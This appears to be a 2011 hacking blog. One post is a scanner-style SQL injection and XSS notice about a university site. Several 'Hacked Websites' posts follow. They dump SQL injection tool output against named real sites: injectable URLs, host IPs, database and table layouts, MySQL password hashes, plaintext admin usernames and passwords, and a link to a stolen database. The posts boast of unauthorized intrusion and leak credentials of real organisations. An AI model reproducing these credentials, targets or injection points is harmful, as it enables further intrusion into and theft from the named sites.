RSS

Jntu Hyderabad Vulnerable with Blind SQL Injection and XSS


The best university in India

JNTUH has in total 415 affiliated colleges:

287 Engg & Tech. (250 existing + 37 new)

95 Pharmacy (90 existing + 05 new)

21 Standalone MCA and/or MBA (10 existing + 11 new)

12 Integrated Campuses (E-12, P-6, MBA-8, MCA-2)

But this website is Vulnerable With Blind Sql injection and Cross site scripting. This may compromise the integrity of your database and/or expose sensitive information.

Please try to Patch all those Vulnerabilities As Soon As Possible

Vulnerability description

This script is possibly vulnerable to SQL Injection attacks.

SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn’t properly filter out dangerous characters.

This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable.

This vulnerability affects /xxxx.php.

Discovered by: Scripting (Blind_Sql_Injection.script).

The impact of this vulnerability

An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.

Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.

Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.

 

 

Cross Site Scripting

Vulnerability description

This script is possibly vulnerable to Cross Site Scripting (XSS) attacks.
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.

The impact of this vulnerability

Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.

 

 
Leave a comment

Posted by on June 21, 2011 in Vulnerable Websites

 

Hacked Pakisthan (balochistanpolice) http://www.balochistanpolice.gov.pk/page.php?id=3


Target:         http://www.balochistanpolice.gov.pk/page.php?id=3
Host IP:        213.171.219.2
Web Server:     Microsoft-IIS/6.0
Powered-by:     PHP/5.2.6
DB Server:     MSAccess
Resp. Time(avg):    760 ms
Web Root:     c:\php\
Drive:         c:
d: (Drive error! maybe it’s CD-ROM)

 

DB Detection: MSAccess (Auto Detected)
Method: GET
Type: Integer (Auto Detected)
 
Leave a comment

Posted by on June 21, 2011 in Hacked Websites

 

Hacked Agenceva (http://www.agencevu.com/stories/index.php?id=1021&p=238)


Target:         http://www.agencevu.com/stories/index.php?id=1021&p=238
Host IP:        91.121.167.130
Web Server:     Apache
DB Server:     MySQL >=5
Resp. Time(avg):    438 ms
Current User:     proxygen@localhost
Sql Version:     5.0.51a-3ubuntu5.8-log
Current DB:     agencevu
System User:     proxygen@localhost
Host Name:     ns202929.ovh.net
Installation dir:     /usr/
DB User & Pass:     root:*D18C1385B4395880C65781B30EFA386C07D51782:localhost
root:*D18C1385B4395880C65781B30EFA386C07D51782:
debian-sys-maint:*4E8A230C2B6061B77CC829BB42AC0032B8B79556:localhost
debian-sys-maint:*4E8A230C2B6061B77CC829BB42AC0032B8B79556:
pma:*E23766DD062B325046F2A4441A0E0432A84E3FC7:localhost
proxygen:*F9A985BBE5417B9FCD79A841D8B20208663C2C32:
felixfm7:*1EA326C35707BE1F10B2755B7D692E514A51C6CF:
abventix:*581DB7D12F23B37DA3A7E93B4C1B865A74F81AF2:
web:*CD0D371B47B0E3B18186E8B58218F942B5A13F20:
cigraphit:*C3852B4EEC5C5DE6A78962ACABC27090B8D40BFB:
ticketusfm10:*92C6E3A36C987F05B988787D280052111AC62771:
ticketusfm10:*92C6E3A36C987F05B988787D280052111AC62771:%
wikiadmin:*D18C1385B4395880C65781B30EFA386C07D51782:
status::localhost
Data Bases:     information_schema
abvent
agencevu
backup_renderin
cigraph
galerievu
mysql
oonline
status
store
test-restore

agencevu
Table Name Columns
zones_geo
workshops
villes_pays
users droits id_type password email prenom nom id_user
types_photographes
type_user
type_portfolios
type_contenu
type_communiques
traductions
selections
reportages
prospects_corpo
prospects_concours
prix
portfolios
photos_selections
photos_reportages
photos_galerievu
photos_expositions
photos_corporate
photos_clients
photographes
pays
news
menus
livres
lieux
interviews
homepage
home_reportages
galerievu
expositions
cv_corporate
coucours_corporate
corporate
continents
concours_corporate8
concours_corporate7
concours_corporate6
concours_corporate5
concours_corporate4
concours_corporate3
concours_corporate2
communiques
clients
boites
asso_reportages_photographes
asso_prix_photographes
asso_livres_photographes
asso_expos_photographes
asso_com_photographes

 

information_schema
Table Name Columns

 

abvent
Table Name Columns

 

backup_renderin
Table Name Columns

 

cigraph
Table Name Columns

 

galerievu
Table Name Columns

 

mysql
Table Name Columns

 

oonline
Table Name Columns

 

status
Table Name Columns

 

store
Table Name Columns

 

test-restore
Table Name Columns
 
Leave a comment

Posted by on June 21, 2011 in Hacked Websites

 

Hacked Pakisthan hubbardbreeders ( http://www.hubbardbreeders.com/news/index.php?id=66)


Target:         http://www.hubbardbreeders.com/news/index.php?id=66
Host IP:        195.78.94.19
Web Server:     Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/1.0.0a PHP/5.3.5 with Suhosin-Patch
Powered-by:     PHP/5.3.5
DB Server:     MySQL >=5

Username: Admin

Password: Ecuador

hubbard
Table Name Columns
users jobtitle companyname country email lastname firstname id
translations
technicalbulletins
subproducts
staticpages
regions
products
newsletter
news
managementtypes
managementguides
library
industryevents
downloads
countries
backgrounds
 
Leave a comment

Posted by on June 21, 2011 in Hacked Websites

 

Hacked Pakisthan HAZARA University ( http://www.hu.edu.pk/contacts.php?id=%Inject_Here%2 )


Target: http://www.hu.edu.pk/contacts.php?id=%Inject_Here%2
Date: 6/18/2011 2:47:33 PM
DB Detection: MySQL error based (Auto Detected)
Method: GET
Type: String (Auto Detected)
Data Base: c3results
Table: admin
Total Rows: 1

 

id u_name passwrd
123_admin_123 123_hazara_123

 

 
Leave a comment

Posted by on June 21, 2011 in Hacked Websites

 

Hacked PAKISTHAN Online News(http://www.onlinenews.com.pk/details.php?id=180339)


Target: http://www.onlinenews.com.pk/details.php?id=180339
Host IP: 203.124.43.81
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.8
DB Server: MySQL
Resp. Time(avg): 1150 ms
Current User: onlinenews@localhost
Sql Version: 5.0.45-community-nt
Current DB: onlinenews
System User: onlinenews@localhost
Host Name: host06
Installation dir: C:\Program Files\MySQL\MySQL Server 5.0
DB User: ‘onlinenews’@’%’
Data Bases: information_schema
onlinenews

 

onlinenews
Table Name Columns
writers date address email name writerId
writerdetails
voteanswers
vote2questions
vote2choice
vote2answers
vote1
urduheads
urduarticles
triger
summary_results
sadmin2 priority signature password login id
publicopinion
pictorial
picofday
parties
news
maincategories
intranetfiles
intranet
heads
floodcontrol
contestant
constituency
assemblies
arabic

Username: Admin

Password: 4bc2cfed02b6bebf99b6646c82cec3b8  (onlineunited507)

Hash: onlineunited507

Pinformation_schema

 
Leave a comment

Posted by on June 21, 2011 in Hacked Websites

 

PAKBUGS Complete DataBase


https://www.box.net/shared/vpgzcxct80ya40dd38cr

 

 
Leave a comment

Posted by on June 19, 2011 in Hacked Websites